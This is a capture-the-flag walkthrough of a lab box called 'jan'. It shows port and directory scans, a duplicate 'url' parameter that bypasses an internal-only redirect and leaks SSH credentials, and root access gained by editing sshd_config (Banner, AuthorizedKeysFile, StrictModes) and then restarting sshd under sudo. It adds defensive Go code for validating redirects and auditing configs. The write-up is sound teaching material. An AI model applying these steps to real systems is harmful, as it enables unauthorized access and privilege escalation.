
HMV-jan

HMV-jan box walkthrough retrospective

Port scan

┌──(root㉿kakeru)-[~/tmp]
└─# nmap -A 192.168.240.147
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-05 10:22 CST
Nmap scan report for 192.168.240.147 (192.168.240.147)
Host is up (0.0027s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.9 (protocol 2.0)
| ssh-hostkey:
| 256 2c:0b:57:a2:b3:e2:0f:6a:c0:61:f2:b7:1f:56:b4:42 (ECDSA)
|_ 256 45:97:b0:2b:48:9b:4a:36:8e:db:44:bd:3f:15:cf:32 (ED25519)
8080/tcp open http Golang net/http server
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
| fingerprint-strings:
| FourOhFourRequest, GetRequest, HTTPOptions:
| HTTP/1.0 200 OK
| Date: Wed, 05 Feb 2025 02:22:24 GMT
| Content-Length: 45
| Content-Type: text/plain; charset=utf-8
| Welcome to our Public Server. Maybe Internal.
| GenericLines, Help, LPDString, RTSPRequest, SIPOptions, SSLSessionReq, Socks5:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| OfficeScan:
| HTTP/1.1 400 Bad Request: missing required Host header
| Content-Type: text/plain; charset=utf-8
| Connection: close
|_ Request: missing required Host header
|_http-open-proxy: Proxy might be redirecting requests

Web enumeration

┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.240.147:8080
Welcome to our Public Server. Maybe Internal.

Nothing useful here, so run a directory scan.

┌──(root㉿kakeru)-[~/tmp]
└─# dirsearch -u http://192.168.240.147:8080
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/tmp/reports/http_192.168.240.147_8080/_25-02-05_10-25-54.txt

Target: http://192.168.240.147:8080/

[10:25:54] Starting:
[10:25:54] 301 - 57B - /%2e%2e//google.com -> /%252E%252E/google.com
[10:25:57] 301 - 65B - /axis2//axis2-web/HappyAxis.jsp -> /axis2/axis2-web/HappyAxis.jsp
[10:25:57] 301 - 59B - /axis2-web//HappyAxis.jsp -> /axis2-web/HappyAxis.jsp
[10:25:57] 301 - 54B - /axis//happyaxis.jsp -> /axis/happyaxis.jsp
[10:25:58] 301 - 87B - /Citrix//AccessPlatform/auth/clientscripts/cookies.js -> /Citrix/AccessPlatform/auth/clientscripts/cookies.js
[10:25:59] 301 - 77B - /engine/classes/swfupload//swfupload_f9.swf -> /engine/classes/swfupload/swfupload_f9.swf
[10:25:59] 301 - 74B - /engine/classes/swfupload//swfupload.swf -> /engine/classes/swfupload/swfupload.swf
[10:25:59] 301 - 62B - /extjs/resources//charts.swf -> /extjs/resources/charts.swf
[10:26:00] 301 - 72B - /html/js/misc/swfupload//swfupload.swf -> /html/js/misc/swfupload/swfupload.swf
[10:26:03] 400 - 24B - /redirect
[10:26:03] 200 - 16B - /robots.txt
Task Completed
┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.240.147:8080/robots.txt
/redirect
/credz
┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.240.147:8080//credz
<a href="/credz">Moved Permanently</a>.
┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.240.147:8080/redirect
Parameter 'url' needed.
┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.240.147:8080/redirect?url=1
Only accessible internally.

Two paths are given here, but requesting each one on its own returns nothing, and adding the url parameter to /redirect did not help either.
In a previous box the given paths were something like secret and home, and the solution was to request a combined path built from both.
I tried that here as well -> still nothing, and scanning for second-level directories found nothing either.
It turns out the hint is that the url parameter should be given /credz, and it has to be sent twice in the same request so that the HTTP handler ends up using the last copy of the parameter.

┌──(root㉿kakeru)-[~/tmp]
└─# curl 'http://192.168.240.147:8080/redirect?url=1&url=/credz'
ssh/EazyLOL

That gives the SSH username and password; the username is literally ssh.
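The redirect bypass above is a parameter-handling inconsistency: the value that gets checked is not the value that gets used. The Go snippet below is an added illustration, not the box's code; the real handler's logic is unknown, so VulnerableRedirect is a hypothetical model in which the validator reads the first url value while the fetcher keeps the last, and HardenedRedirect shows the fix of refusing repeated parameters and using exactly the validated value.

```go
package main

import (
	"errors"
	"net/url"
	"strings"
)

// Hypothetical model, not the box's code: validator reads the FIRST "url" (url.Values.Get), fetcher keeps the LAST.
// fetcherValue mimics a hand-rolled parse of the raw query that keeps the last "url".
func fetcherValue(rawQuery string) string {
	target := ""
	for _, kv := range strings.Split(rawQuery, "&") {
		if k, v, ok := strings.Cut(kv, "="); ok && k == "url" {
			target, _ = url.QueryUnescape(v)
		}
	}
	return target
}

// VulnerableRedirect returns the value that was checked and the path that would be fetched.
func VulnerableRedirect(rawQuery string) (checked, fetched string, err error) {
	q, perr := url.ParseQuery(rawQuery)
	if perr != nil {
		return "", "", perr
	}
	checked = q.Get("url") // first copy only
	if !strings.HasPrefix(checked, "/") { // also rejects a missing/empty value
		return checked, "", errors.New("Only accessible internally.")
	}
	return checked, fetcherValue(rawQuery), nil // fetched may differ from checked
}

// HardenedRedirect refuses repeated parameters and fetches exactly the value it validated.
func HardenedRedirect(rawQuery string) (string, error) {
	q, err := url.ParseQuery(rawQuery)
	if err != nil {
		return "", err
	}
	vals := q["url"]
	if len(vals) != 1 { // missing or repeated: refuse rather than silently pick one copy
		return "", errors.New("exactly one 'url' parameter required")
	}
	if !strings.HasPrefix(vals[0], "/") {
		return "", errors.New("Only accessible internally.")
	}
	return vals[0], nil
}
```

The defensive point is that len(q["url"]) must be checked once, up front; any code path that re-parses the raw query is a second parser that can disagree with the first.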

Privilege escalation

There is a sudo rule that allows restarting the SSH service:

jan:~$ sudo -l
Matching Defaults entries for ssh on jan:
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

Runas and Command-specific defaults for ssh:
Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"

User ssh may run the following commands on jan:
(root) NOPASSWD: /sbin/service sshd restart

So the goal is to modify the SSH configuration file and then use that rule to restart the service. The file is sshd_config (what gets modified is the client-side content):

#X11UseLocalhost yes
#PermitTTY yes
#PrintMotd yes
#PrintLastLog yes
#TCPKeepAlive yes
#PermitUserEnvironment no
#Compression delayed
#ClientAliveInterval 0
#ClientAliveCountMax 3
#UseDNS no
#PidFile /run/sshd.pid
#MaxStartups 10:30:100
#PermitTunnel no
#ChrootDirectory none
#VersionAddendum none

# no default banner path
#Banner /root/root.txt

# override default of no subsystems
Subsystem sftp internal-sftp

# Example of overriding settings on a per-user basis
#Match User anoncvs
# X11Forwarding no
# AllowTcpForwarding no
# PermitTTY no
# ForceCommand cvs server

Here the Banner directive can be changed to point at any file we want to read.
But logging in with ssh directly then throws an error:

jan:/etc/ssh$ ssh root@locakhost
/etc/ssh/ssh_config: line 23: Bad configuration option: banner
/etc/ssh/ssh_config: terminating, 1 bad configuration options

Following the error message, delete the banner line from ssh_config.

Then ssh shows the flag:

┌──(root㉿kakeru)-[~/tmp]
└─# ssh ssh@192.168.240.147
HMV2PRMTERWTFUDNGMBG
ssh@192.168.240.147's password:

To log in as root, we can modify

AuthorizedKeysFile      .ssh/authorized_keys

and change .ssh/authorized_keys to a file we create ourselves, /home/ssh/authorized_keys:

jan:~$ echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCxliao26atOJyX3C9UgtIxt3RY9S4n921sYgmAxhw5sB58FESP8E+kWMC4QbT2
3azUa8zVr76QNhru+LVFTrW5R9SyxDDYQWjfRwDBiSe2X5MNiqoQU4tiW71DGYiO9M0xQNVx5Auvx6Ip6+kJqEpnXoU0Gw4zRxB3HjeEwYIly8HFA
TKaOP3Gh7rhwOXJ8gjcF7d6NcnsNbnOeUEArJjDhsax72TIiBYmza0PTg+8YZrjwvDqdZ+swMq5R9SPsn4sLyF5R82wjAajO4ce8qwcIanBxw5KeB
fiChtilCaYb0JXH2bNlyQwedGjL2ARtnjgPhIKU/3N42trAcEXDwBCxkLRRGVkgrFDdYN70kcgfo2+7A7hBk2H7EFfY44bGcD9+YDsEqVS38VfxcD
HNfM5V1ypS+ZirpY/RXK+46nHfAaieMuhNffS/zegzQEUTR1iHXWvDFOlwS7w3SNiBh4p69NyefputLJEdBhWUrIbsqvIOOzVNC03f7hd0Yq0gsZb
vt7g10X4k18Wf7aI/3qg26Yw+LJ9zq1VBSKaon0fTYtxrDGyn3qGeT1dKUyFQzbKkKN19X6VYjlSWzFvEft7lgLixwZnsQabUR8XT0UIwfJbN7FU9
j+hQos8PBWXsqZIX1q+by5prOChPXMP9phGofL8q+SrrKdPUZDMxV8Hbw== root@kakeru' > authorized_keys

Don't open the file in vi and paste the key in; echo it in like this instead (I tried pasting directly and it didn't work, probably a line-ending issue).
The content is your own machine's .ssh/id_rsa.pub.
The config file also needs this change:

StrictModes no  # changed from yes to no, with the leading comment marker removed

Root shell obtained:

┌──(root㉿kakeru)-[~/.ssh]
└─# ssh root@192.168.240.147
HMV2PRMTERWTFUDNGMBG
Welcome to Alpine!

The Alpine Wiki contains a large amount of how-to guides and general
information about administrating Alpine systems.
See <https://wiki.alpinelinux.org/>.

You can setup the system with the command: setup-alpine

You may change this message by editing /etc/motd.

jan:~# id
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
jan:~#
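Every step of the privilege escalation above came from editing three sshd_config directives (Banner, AuthorizedKeysFile, StrictModes) and restarting the daemon through the sudo rule. The Go function below is an added example, not part of the writeup, that flags exactly those settings in a config file so a defender can catch such edits; the rules and the AuditSSHDConfig name are my own, not OpenSSH's.

```go
package main

import (
	"bufio"
	"fmt"
	"strings"
)

// AuditSSHDConfig scans sshd_config text for the three directives abused above and
// returns one finding per risky setting. Constructed example: the rules are mine, not
// OpenSSH's or the box's; Match blocks and Key=Value syntax are not handled.
func AuditSSHDConfig(cfg string) []string {
	safeBanner := map[string]bool{"none": true, "/etc/issue": true, "/etc/issue.net": true}
	var findings []string
	sc := bufio.NewScanner(strings.NewReader(cfg))
	for sc.Scan() {
		fields := strings.Fields(sc.Text())
		if len(fields) < 2 || strings.HasPrefix(fields[0], "#") {
			continue // blank line or commented-out directive
		}
		switch strings.ToLower(fields[0]) {
		case "banner":
			// Banner contents are sent to the client before authentication.
			if b := fields[1]; !safeBanner[b] && !strings.HasPrefix(b, "/etc/ssh/") {
				findings = append(findings, "Banner "+b+": file contents disclosed pre-auth")
			}
		case "authorizedkeysfile":
			// An absolute path without %u/%h tokens applies one key file to every user, root included.
			for _, p := range fields[1:] {
				if strings.HasPrefix(p, "/") && !strings.Contains(p, "%") {
					findings = append(findings, "AuthorizedKeysFile "+p+": one key file shared by all users")
				}
			}
		case "strictmodes":
			if strings.EqualFold(fields[1], "no") {
				findings = append(findings, "StrictModes no: group/world-writable key files accepted")
			}
		}
	}
	return findings
}

func main() {
	// Constructed sample reproducing the three edits made in this writeup.
	sample := "Banner /root/root.txt\nAuthorizedKeysFile /home/ssh/authorized_keys\nStrictModes no\nSubsystem sftp internal-sftp\n"
	for _, f := range AuditSSHDConfig(sample) {
		fmt.Println(f)
	}
}
```

The check is only useful alongside the root-cause fix: sshd_config must not be writable by the account that is allowed to restart sshd.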